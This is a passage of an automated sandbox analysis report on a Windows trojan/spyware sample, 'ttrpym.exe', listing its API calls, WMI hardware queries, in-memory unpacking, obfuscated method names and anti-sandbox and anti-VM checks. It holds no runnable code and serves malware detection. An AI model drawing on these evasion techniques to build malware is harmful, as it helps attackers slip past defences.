              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_012BAD42 NtQuerySystemInformation,3_2_012BAD42
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_012BAD20 NtQuerySystemInformation,3_2_012BAD20
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 0_2_02DBE7980_2_02DBE798
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 0_2_02DBE7920_2_02DBE792
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 0_2_02DBC4340_2_02DBC434
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_004060F03_2_004060F0
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_004061593_2_00406159
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_0040A5703_2_0040A570
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_004107A53_2_004107A5
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_00405A803_2_00405A80
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_00402AB03_2_00402AB0
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_00405D603_2_00405D60
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_00409E703_2_00409E70
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_0040AE0F3_2_0040AE0F
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_0040BE303_2_0040BE30
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_012C60423_2_012C6042
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: String function: 00410D6C appears 44 times
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: String function: 0040443A appears 44 times
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: String function: 004044F1 appears 63 times
              Source: ttrpym.exe, 00000000.00000002.272887494.0000000008D80000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs ttrpym.exe
              Source: ttrpym.exe, 00000000.00000002.263886998.0000000000C60000.00000002.00020000.sdmpBinary or memory string: OriginalFilename vs ttrpym.exe
              Source: ttrpym.exe, 00000003.00000002.614307739.0000000000FCE000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametTIrQqSUbanmBpkFjGvOpEbqCmHMJjJZ.exe4 vs ttrpym.exe
              Source: ttrpym.exe, 00000003.00000002.614132584.0000000000B80000.00000002.00020000.sdmpBinary or memory string: OriginalFilename vs ttrpym.exe
              Source: ttrpym.exeBinary or memory string: OriginalFilename vs ttrpym.exe
              Source: C:\Users\user\Desktop\ttrpym.exeSection loaded: security.dllJump to behavior
              Source: ttrpym.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: ttrpym.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: 3.2.ttrpym.exe.f80000.2.unpack, e3nXyWx54eXrMCJOPu/eAcKHQHop2SvdpjExo.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.ttrpym.exe.f80000.2.unpack, e3nXyWx54eXrMCJOPu/eAcKHQHop2SvdpjExo.csCryptographic APIs: 'CreateDecryptor'
              Source: ttrpym.exe, 00000000.00000003.250562979.0000000005E7B000.00000004.00000001.sdmpBinary or memory string: Century Schoolbook is a registered trademark of The Monotype Corporation plc.slnt+n\
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@26/2
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_012BA5B6 AdjustTokenPrivileges,3_2_012BA5B6
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_012BA57F AdjustTokenPrivileges,3_2_012BA57F
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_00401470 _getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,CloseHandle,Module32Next,CloseHandle,CloseHandle,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,_memset,LoadLibraryA,GetProcAddress,CLRCreateInstance,GetProcAddress,GetModuleFileNameA,GetModuleFileNameW,3_2_00401470
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_00401470 _getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,CloseHandle,Module32Next,CloseHandle,CloseHandle,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,_memset,LoadLibraryA,GetProcAddress,CLRCreateInstance,GetProcAddress,GetModuleFileNameA,GetModuleFileNameW,3_2_00401470
              Source: C:\Users\user\Desktop\ttrpym.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ttrpym.exe.logJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
              Source: ttrpym.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\ttrpym.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dllJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dllJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: ttrpym.exeReversingLabs: Detection: 50%
              Source: unknownProcess created: C:\Users\user\Desktop\ttrpym.exe 'C:\Users\user\Desktop\ttrpym.exe'
              Source: unknownProcess created: C:\Users\user\Desktop\ttrpym.exe {path}
              Source: C:\Users\user\Desktop\ttrpym.exeProcess created: C:\Users\user\Desktop\ttrpym.exe {path}Jump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: ttrpym.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: C:\Users\user\Desktop\ttrpym.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
              Source: ttrpym.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

              Data Obfuscation:

              barindex
              .NET source code contains potential unpackerShow sources
              Source: ttrpym.exe, GuideListFormatter/GuideListFormatter.cs.Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.2.ttrpym.exe.b80000.0.unpack, GuideListFormatter/GuideListFormatter.cs.Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.0.ttrpym.exe.b80000.0.unpack, GuideListFormatter/GuideListFormatter.cs.Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 3.2.ttrpym.exe.aa0000.1.unpack, GuideListFormatter/GuideListFormatter.cs.Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 3.0.ttrpym.exe.aa0000.0.unpack, GuideListFormatter/GuideListFormatter.cs.Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_00401470 _getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,CloseHandle,Module32Next,CloseHandle,CloseHandle,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,_memset,LoadLibraryA,GetProcAddress,CLRCreateInstance,GetProcAddress,GetModuleFileNameA,GetModuleFileNameW,3_2_00401470
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 0_2_02DBD5EB push 0000005Dh; retn 0004h0_2_02DBD65D
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_0041C45C push cs; iretd 3_2_0041C532
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_0041C55E push cs; iretd 3_2_0041C532
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_0041C70E push ebx; ret 3_2_0041C70F
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_00410DB1 push ecx; ret 3_2_00410DC4
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_012C517A pushad ; ret 3_2_012C5181
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_012C5172 push esp; ret 3_2_012C5179
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_012C51A2 pushfd ; ret 3_2_012C51A9
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_012C73CB push ecx; retf 3_2_012C73D5
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_012CD67D push ebx; ret 3_2_012CD68A
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_012C4F38 push 3C012C51h; ret 3_2_012C4F3D
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_012C4F6E push esp; ret 3_2_012C4F91
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_0178591D push ebx; iretd 3_2_01785920
              Source: initial sampleStatic PE information: section name: .text entropy: 7.96541170313
              Source: 3.2.ttrpym.exe.f80000.2.unpack, e3nXyWx54eXrMCJOPu/eAcKHQHop2SvdpjExo.csHigh entropy of concatenated method names: '.cctor', 'EJWuFMmTwcOCj', 'eWaH61iq7', 'eLDx5Mj1j', 'eGN9hjVJU', 'eJNVII0RA', 'NvQ34uZt895nxEhi2FIr', 'ecKhHQop2', 'eSvjdpjEx', 'eo35nXyW5'
              Source: C:\Users\user\Desktop\ttrpym.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion:

              barindex
              Found evasive API chain (trying to detect sleep duration tampering with parallel thread)Show sources
              Source: C:\Users\user\Desktop\ttrpym.exeFunction Chain: threadResumed,threadDelayed,memAlloc,systemQueried,systemQueried,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,systemQueried,memAlloc,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,memAlloc,threadAPCQueued,threadDelayed,threadDelayed,threadDelayed,threadDelayed
              Source: C:\Users\user\Desktop\ttrpym.exeFunction Chain: threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,systemQueried,memAlloc,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,memAlloc,threadAPCQueued,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,memAlloc,memAlloc,memAlloc,memAlloc
              Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: ttrpym.exe, 00000000.00000002.264766297.0000000002FA1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: ttrpym.exe, 00000000.00000002.264766297.0000000002FA1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\ttrpym.exeCode function: 3_2_00401470 _getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,CloseHandle,Module32Next,CloseHandle,CloseHandle,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,_memset,LoadLibraryA,GetProcAddress,CLRCreateInstance,GetProcAddress,GetModuleFileNameA,GetModuleFileNameW,3_2_00401470
              Source: C:\Users\user\Desktop\ttrpym.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeWindow / User API: threadDelayed 756Jump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exe TID: 6404Thread sleep time: -31500s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exe TID: 6428Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exe TID: 7112Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exe TID: 7112Thread sleep time: -6540000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exe TID: 7112Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exe TID: 7112Thread sleep time: -58156s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exe TID: 7112Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
